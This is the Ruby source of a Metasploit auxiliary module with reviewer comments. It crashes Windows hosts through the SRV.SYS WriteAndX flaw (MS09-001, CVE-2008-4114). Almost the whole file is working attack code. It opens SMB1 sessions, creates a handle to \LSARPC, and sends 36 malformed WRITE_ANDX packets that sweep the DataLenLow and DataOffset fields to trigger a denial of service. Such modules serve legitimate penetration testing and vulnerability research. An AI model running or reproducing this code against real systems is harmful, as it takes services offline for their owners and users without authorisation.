Path: blob/master/modules/auxiliary/dos/windows/smb/ms09_001_write.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Denial-of-service module for the SRV.SYS issue referenced below as
# MS09-001 / CVE-2008-4114. The metadata states it was tested against
# Windows Vista; the file performs no other target or version check.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  # Registers module metadata and references.
  # SMB::ProtocolVersion is deregistered because #send_smb_pkt always
  # calls connect(versions: [1]), so the option could never take effect.
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
      'Description' => %q{
        This module exploits a denial of service vulnerability in the
        SRV.SYS driver of the Windows operating system.

        This module has been tested successfully against Windows Vista.
      },

      'Author'      => [ 'j.v.vallejo[at]gmail.com' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['MSB', 'MS09-001'],
          ['OSVDB', '48153'],
          ['CVE', '2008-4114'],
          ['BID', '31179'],
        ]
      )
    )

    deregister_options('SMB::ProtocolVersion')
  end


  # Opens a new SMB1 session, issues NT_CREATE_ANDX for the Unicode name
  # "\LSARPC", then sends one WRITE_ANDX against the returned FileID whose
  # length/offset fields are taken from the parameters.
  #
  # @param dlenlow    [Integer] written to the WRITE_ANDX DataLenLow field
  # @param doffset    [Integer] written to the WRITE_ANDX DataOffset field
  # @param fillersize [Integer] length of the random filler; also written to
  #                   the Remaining and ByteCount fields
  # @return [void] the WRITE_ANDX response is not read
  #
  # NOTE(review): connect() is called on every invocation and there is no
  # disconnect() anywhere in this method, so each of the calls made by #run
  # leaves its session open until the framework tears the module down.
  def send_smb_pkt(dlenlow, doffset,fillersize)

    connect(versions: [1])
    smb_login()

    # --- NT_CREATE_ANDX: open a handle that the write below can target ---
    pkt = CONST::SMB_CREATE_PKT.make_struct
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc807

    # Session identifiers are copied from the client state established by
    # smb_login so the request is accepted as part of this session.
    pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
    pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
    pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
    pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

    pkt['Payload']['SMB'].v['WordCount'] = 24

    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['AndXOffset'] = 0xdede
    pkt['Payload'].v['FileNameLen'] = 14          # 7 UTF-16 code units, see Payload below
    pkt['Payload'].v['CreateFlags'] = 0x16
    pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
    pkt['Payload'].v['ShareAccess'] = 7
    pkt['Payload'].v['CreateOptions'] = 0x400040
    pkt['Payload'].v['Impersonation'] = 2
    pkt['Payload'].v['Disposition'] = 1
    # Leading pad byte followed by "\LSARPC" with a NUL after every character.
    pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


    simple.client.smb_send(pkt.to_s)
    # Only the FileID of the create response is used further down.
    ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)

    # --- WRITE_ANDX: the request carrying the caller-supplied fields ---
    pkt = CONST::SMB_WRITE_PKT.make_struct
    # NOTE(review): data_offset is assigned here but never referenced again;
    # the DataOffset field below is populated from the doffset parameter.
    data_offset = pkt.to_s.length - 4
    filler = Rex::Text.rand_text(fillersize)

    # Signature fields are set to a fixed marker value rather than a
    # computed SMB signature.
    pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
    pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
    pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
    pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
    pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
    pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc807
    pkt['Payload']['SMB'].v['WordCount'] = 14
    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['AndXOffset'] = 0xdede
    pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
    pkt['Payload'].v['Offset'] = 0
    pkt['Payload'].v['Reserved2'] = -1
    pkt['Payload'].v['WriteMode'] = 8
    pkt['Payload'].v['Remaining'] = fillersize
    pkt['Payload'].v['DataLenHigh'] = 0
    # The two fields below are the ones #run sweeps; everything else in this
    # packet is constant across calls. Note DataLenLow, DataOffset and
    # ByteCount are set independently and are not kept consistent with
    # each other or with the actual filler length.
    pkt['Payload'].v['DataLenLow'] = dlenlow     # from parameter (swept by #run)
    pkt['Payload'].v['DataOffset'] = doffset     # from parameter (swept by #run)
    pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc
    pkt['Payload'].v['ByteCount'] = fillersize
    pkt['Payload'].v['Payload'] = filler

    # Fire-and-forget: no smb_recv_parse for the write response.
    simple.client.smb_send(pkt.to_s)
  end

  # Sweeps DataOffset (j) and DataLenLow (i) from 0xffff downward in steps
  # of 10000 while each stays above 10000 (six values each, 36 packets in
  # total) with a fixed 72-byte filler. Each send opens its own SMB session
  # via #send_smb_pkt. A bare rescue catches StandardError only, prints
  # "rescue" and moves on to the next value, so a target that has stopped
  # answering does not end the loop early; Interrupt still propagates.
  def run

    print_line("Attempting to crash the remote host...")
    k=72          # fillersize, constant for every packet
    j=0xffff      # DataOffset
    while j>10000
      i=0xffff    # DataLenLow
      while i>10000
        begin
          print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
          send_smb_pkt(i,j,k)
        rescue
          print_line("rescue")
        end
        i=i-10000
      end
      j=j-10000
    end
  end
end